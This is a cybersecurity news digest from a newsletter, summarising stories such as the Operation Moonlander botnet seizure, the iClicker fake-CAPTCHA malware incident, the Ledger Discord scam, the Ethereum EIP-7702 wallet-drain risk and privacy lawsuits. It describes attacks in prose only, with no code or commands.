US feds seize two top botnet sites in Operation Moonlander

Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.

If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!

The US Justice Department said it seized two powerful botnet sites, Anyproxy.net and 5socks.net, in an operation called “Moonlander.”

Three Russian nationals, 37-year-old Alexey Viktorovich Chertkov, 41-year-old Kirill Vladimirovich Morozov, and 36-year-old Aleksandr Aleksandrovich Shishkin, were charged with conspiracy and damage to protected computers for running botnet services offered through Anyproxy and 5socks. Kazakhstani national Dmitriy Rubtsov, 38, was hit with the same charges.

The four created the botnets by infecting older-model wireless internet routers in the U.S. and abroad. A malware campaign allowed the men to reconfigure the routers and sell them as proxy servers through the Anyproxy and 5socks sites. 

The 5socks.net website offered more than 7,000 proxies for sale and allowed users to pay monthly fees of up to $110 for access. 

The Justice Department said a Virginia company managed the website domains and that the four men allegedly earned about $46 million through the infected routers over a 20-year stretch. 

The notice coincides with an alert released by the FBI on Wednesday, warning people that end-of-life routers no longer supported by the companies that made them were the primary target of the administrators behind Anyproxy and 5socks.  (Jonathan Greig / The Record)

Related: Justice Department, Security Week, IT Pro, Security Affairs, The Cyber Express, Infosecurity Magazine, TechCrunch

A Florida bill, Social Media Use by Minors, which would have required social media companies to provide an encryption backdoor for allowing police to access user accounts and private messages, failed to pass.

The bill was “indefinitely postponed” and “withdrawn from consideration” in the Florida House of Representatives earlier this week. Lawmakers in the Florida Senate had already voted to advance the legislation, but a bill requires both legislative chambers to pass it before it can become law.

The bill would have required social media firms to “provide a mechanism to decrypt end-to-end encryption when law enforcement obtains a subpoena,” typically issued by law enforcement agencies and without judicial oversight.

Digital rights group the Electronic Frontier Foundation called the bill “dangerous and dumb.” Security professionals have long argued that it is impossible to create a secure backdoor that cannot also be maliciously abused, and encryption backdoors put user data at risk of data breaches. (Zack Whittaker / TechCrunch)

Related: Cyber Daily, Edmond Thorne

Police detained a 45-year-old man wanted internationally for serious cybercrime in the Republic of Moldova following a joint operation conducted by Moldovan officers and the Kingdom of the Netherlands authorities.

The arrest was made following an international cooperation operation carried out by the Center for Combating Cybercrime and the Criminal Investigation Division of the National Investigation Inspectorate, PCCOCS prosecutors, and Dutch law enforcement agencies. The suspect was temporarily on Moldovan territory.

The man is suspected of organizing several cyberattacks on companies in the Netherlands, including a “ransomware” attack on the Netherlands Organization for Scientific Research, which resulted in an estimated damage of €4.5 million. In addition to cyberattacks, he is also suspected of blackmail and money laundering.

On May 6, the Moldovan authorities searched his home and car and seized relevant evidence, including €84,800 (around $94,000) in cash, an electronic wallet, electronic devices, and bank cards. (IPN.md)

Related: Politie.nl

iClicker's website, a popular student engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA prompt to trick students and instructors into installing malware on their devices.

A subsidiary of Macmillan, iClicker is widely used by 5,000 instructors and 7 million students at colleges and universities across the United States, including the University of Michigan, the University of Florida, and universities in California.

According to the University of Michigan's Safe Computing team, the iClicker site was hacked between April 12 and April 16, 2025, to display a fake CAPTCHA that instructed users to press "I'm not a robot" to verify themselves.

However, when visitors clicked on the verification prompt, a PowerShell script was silently copied into the Windows clipboard in what is known as a "ClickFix" social engineering attack.

The CAPTCHA would then instruct users to open the Windows Run dialog (Win + R), paste the PowerShell script (Ctrl + V), and execute it by pressing Enter to verify themselves.

iClicker said, "We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted, and the identified vulnerability on the iClicker landing page has been resolved." (Lawrence Abrams / Bleeping Computer)

Related: iClicker, University of Michigan

Google agreed to pay $1.4 billion to the State of Texas to settle two lawsuits accusing it of violating the privacy of state residents by tracking their locations and searches and collecting their facial recognition information.

Google’s settlement is the tech giant's latest legal setback. Over the past two years, Google has lost a string of antitrust cases after being found to have a monopoly over its app store, search engine, and advertising technology. It has spent the past three weeks in the search case trying to fend off a U.S. government request to break up its business.

José Castañeda, a Google spokesman, said the company had already changed its product policies. “This settles a raft of old claims, many of which have already been resolved elsewhere,” he said. (Tripp Mickle / New York Times)

Related: Attorney General of Texas, CNBC, The Guardian, NPR, Newsweek, The Texas Tribune, The Washington Post, The Verge

Wikimedia Foundation’s Lead Counsel Phil Bradley-Schmieg announced that the Foundation, the non-profit that hosts Wikipedia, is challenging the lawfulness of the UK’s Online Safety Act (OSA)’s Categorisation Regulations.

The Online Safety Act was passed into law in October 2023 and implemented stringent measures against social media platforms, search engines, messaging systems, gaming and dating apps, and pornography and file-sharing sites for failing to remove illegal content.

“We are arguing that they place Wikipedia and its users at unacceptable risk of being subjected to the OSA’s toughest ‘Category 1’ duties, which were originally designed to target some of the UK’s riskiest websites,” wrote Bradley-Schmieg, on behalf of the Wikimedia Foundation.

The Wikimedia Foundation said it shares the UK government’s commitment to promoting online environments where everyone can safely participate.

But it said that if enforced on Wikipedia, Category 1 duties would undermine the privacy and safety of Wikipedia volunteer users, expose the encyclopedia to manipulation and vandalism, and divert essential resources from protecting and improving Wikipedia and the other Wikimedia Projects. (Tom Jowitt / Silicon UK)

Related: Wikimedia, Engadget, Gigazine

Hardware wallet provider Ledger has confirmed its Discord server is secure again after an attacker compromised a moderator’s account on May 11 to post scam links that tricked users into revealing their seed phrases on a third-party website.

“One of our contracted moderators had their account compromised, which allowed a malicious bot to post scam links in one channel,” Ledger team member Quintin Boatwright wrote on the Ledger Discord server.

Some members in Ledger’s Discord channel claimed the attacker abused moderator privileges to ban and mute them as they tried to report the breach, possibly slowing Ledger’s reaction.

Boatwright said the security breach was an isolated incident. Ledger has taken additional measures to strengthen its security on Discord, a chat platform many crypto projects use to share protocol developments and engage with their community. 

Using the compromised Ledger community manager account, the hacker told Ledger Discord members that there was a recently discovered vulnerability in the firm’s security systems and strongly urged all users to verify their recovery phrases with a scam link, according to several screenshots shared on X. (Brayden Lindrea / Cointelegraph)

Related: Crypto Briefing, The Block, Mitrade, iHodl, Coinpedia

Ethereum’s latest network upgrade, Pectra, introduced powerful new features to improve scalability and smart account functionality while opening a dangerous new attack vector that could allow hackers to drain funds from user wallets using only an off-chain signature.

Under the Pectra upgrade, which went live on May 7 at epoch 364032, attackers can exploit a new transaction type to take control of externally owned accounts (EOAs) without requiring the user to sign an on-chain transaction.

Arda Usman, a Solidity smart contract auditor, said that “it becomes possible for an attacker to drain an EOA’s funds using only an off-chain signed message (no direct on-chain transaction signed by the user).”

At the center of the risk is Ethereum Improvement Proposal (EIP)-7702, a core component of the Pectra upgrade. The Ethereum Improvement Proposal introduces the SetCode transaction (type 0x04), which enables users to delegate control of their wallet to another contract simply by signing a message.

If an attacker obtains this signature, they can overwrite the wallet’s code with a small proxy that forwards calls to their malicious contract.

Wallets and interfaces that fail to detect or properly represent these new transaction types are most at risk. Rudytsia warned that “wallets are vulnerable if they do not analyze Ethereum’s transaction types,” especially transaction type 0x04.

He emphasized that wallet engines must clearly display delegation requests and flag suspicious addresses. (Amin Haqshanas / Cointelegraph)

Related: Consensys

23andMe, the genetic testing giant once valued in the billions, is now navigating Chapter 11 bankruptcy and notifying millions of current and former customers that they may be eligible to file claims as part of the restructuring process.

The company and 11 of its subsidiaries, including Lemonaid Health and LPRXOne, filed for bankruptcy protection in the Eastern District of Missouri on March 23 of this year.

Customers were alerted Sunday that they have until July 14 to file claims for losses incurred. These customers may file a Cyber Security Incident Claim.

Those who suffered financial or other damages due to the breach can submit a claim as part of the bankruptcy case. Customers with different types of grievances unrelated to the cyberattack, such as issues with DNA test results or the company’s telehealth services, may submit a separate claim under the General Bar Date Package. (Connie Loizos / TechCrunch)

Related: Kroll, US Bankruptcy Court

Researchers at IAS Threat Labs report that a new ad fraud scheme, dubbed Kaleidoscope, is targeting millions of Android users by converting regular apps into profit-generating platforms for cybercriminals.

The scam affects over 2.5 million devices monthly, with India alone accounting for 20%.

The threat has spread to Brazil, Indonesia, and the Philippines through unofficial app stores and direct download links from social media and messaging platforms.

Google has removed flagged apps and promised to protect users against known versions of this scam. However, the problem persists due to lax standards among ad resellers and the decentralized nature of unofficial Android marketplaces.

This has led to a discreet but lucrative scam that prioritizes ad revenue over user experience, thus undermining trust in Android's app ecosystem. (Akash Pandey / NewsBytes)

Related: IAS Threat Lab, PhoneArena

Microsoft is working on adding a new Teams feature that will prevent users from capturing screenshots of sensitive information shared during meetings.

Those joining from unsupported platforms will be automatically placed in audio-only mode to protect shared content. The company plans to start rolling out this new Teams feature to Android, desktop, iOS, and web users worldwide in July 2025.

"To address the issue of unauthorized screen captures during meetings, the Prevent Screen Capture feature ensures that if a user attempts to take a screen capture, the meeting window will turn black, thereby protecting sensitive information," Microsoft shared in a new Microsoft 365 roadmap entry.

"This feature will be available on Teams desktop applications (both Windows and Mac) and Teams mobile applications (both iOS and Android)."

However, even if screenshots are blocked, sensitive media and information shared in Teams meetings can still be captured by taking a photo of the conversation.

Microsoft has yet to share whether the feature will be enabled by default or can be toggled on and off by meeting organizers or admins. (Sergiu Gatlan / Bleeping Computer)

Related: Microsoft, TechRadar, WebProNews, GBHackers, Heise Online

In time for International Anti-Ransomware Day, Kaspersky researchers warn that custom AI tools and RaaS platforms are fueling the next wave of ransomware attacks.

In a new report, they detail how AI is fueling the rapid development of global ransomware attacks and warn that the proliferation of tailored LLMs is poised to significantly amplify cybercriminals' reach and impact.

Among the most prolific threat actors observed using AI is the FunkSec group, which emerged in late 2024 and quickly gained notoriety by surpassing more established actors like Cl0p and RansomHub, claiming eighty-five victims in December alone.

Among other observations, Kaspersky highlights how LLMs marketed on the dark web have lowered the technical barrier to creating malicious code, phishing campaigns, and social engineering attacks, with threat actors able to craft highly convincing lures or automate ransomware deployment. (Tom Quinn / Digit)

Related: Securelist, IT Wire, Cyber Daily

The Bluetooth Special Interest Group (SIG) announced Bluetooth Core Specification 6.1, which improves the popular wireless communication protocol.

One feature highlighted is the increased device privacy via randomized Resolvable Private Addresses (RPA) updates.

A Resolveable Private Address (RPA) is a Bluetooth address created to look random. It is used in place of a device's fixed MAC address to protect user privacy. It allows trusted devices to reconnect securely without revealing their true identity.

Currently, RPAs are updated at fixed intervals, usually every 15 minutes, which introduces a level of predictability. This predictability can be exploited in correlation attacks, making long-term tracking possible.

Bluetooth 6.1 improves privacy by randomly distributing the RPA updates between 8 and 15 minutes (the default) and allowing custom values between 1 second and 1 hour. (Bill Toulas / Bleeping Computer)

Related: Bluetooth, Help Net Security, GBHackers, Android Authority, Techlusive

Best Thing of the Day: Who Knew That Bugs Could Be Beautiful

Computer scientist blinry has launched the Glitch Gallery, a museum of accidental art made up of pretty software bugs.

Bonus Best Thing of the Day: Hollywood's Early Hacking Films Are Younger Than Most Millennials

It's the 30th anniversary of two iconic hacker films, The Net and Hackers, which were prescient in predicting life online.

Worst Thing of the Day: Tyler Durden Predicted This

Silicon Valley tech lords have taken to martial arts to punch, kick, knee, elbow, and sometimes hammer an opponent over the head with their fists.

Closing Thought